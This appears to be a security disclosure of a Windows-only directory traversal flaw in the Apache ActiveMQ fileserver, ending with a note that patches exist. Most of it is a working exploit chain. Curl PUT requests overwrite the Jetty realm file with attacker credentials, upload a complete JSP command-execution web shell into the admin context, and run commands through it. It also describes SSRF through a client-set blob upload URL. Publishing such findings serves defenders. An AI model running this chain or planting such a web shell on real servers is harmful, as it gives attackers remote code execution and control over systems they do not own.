Apache ActiveMQ 5.11.1 / 5.13.2 Directory Traversal / Command Execution

`I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality.   
  
I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter.   
  
An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.  
  
Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:  
  
<bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping">   
<property name="constraint" ref="securityConstraint">   
<property name="pathSpec" value="/api/*,/admin/*,*.jsp">   
</property></property>   
</bean>   
  
Effectively blocking the upload of JSP files into contexts that will allow them to execute.   
  
I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:  
  
$ cat jetty-realm.properties hacker: hacker, admin  
$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties  
  
This seems to have the disadvantage of requiring a reboot of the server to take effect.   
  
I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot.   
The attacker can then take a standard JSP shell:  
  
$ cat cmd.jsp   
<%@ page import="java.util.*,java.io.*"%>   
<%   
%>   
<HTML><BODY>   
Commands with JSP   
<FORM METHOD="GET" NAME="myform" ACTION="">   
<INPUT TYPE="text" NAME="cmd">   
<INPUT TYPE="submit" VALUE="Send">   
</FORM>   
<pre>   
<%   
if (request.getParameter("cmd") != null) {   
out.println("Command: " + request.getParameter("cmd") + "<BR>");   
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));   
OutputStream os = p.getOutputStream();   
InputStream in = p.getInputStream();   
DataInputStream dis = new DataInputStream(in);   
String disr = dis.readLine();   
while ( disr != null ) {   
out.println(disr);   
disr = dis.readLine();   
}   
}   
%>   
</pre>   
</BODY></HTML>   
  
Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:  
  
$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp  
  
And pop a calc on the server:  
  
$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe  
  
Exploiting non-Windows servers  
  
All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked.   
That said, clients can specify the uploadUrl for a blob transfer, e.g.:  
  
tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com  
  
An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.  
  
Resolution  
  
The ActiveMQ project has released an advisory and patches.   
  
This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind.   
  
It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.  
`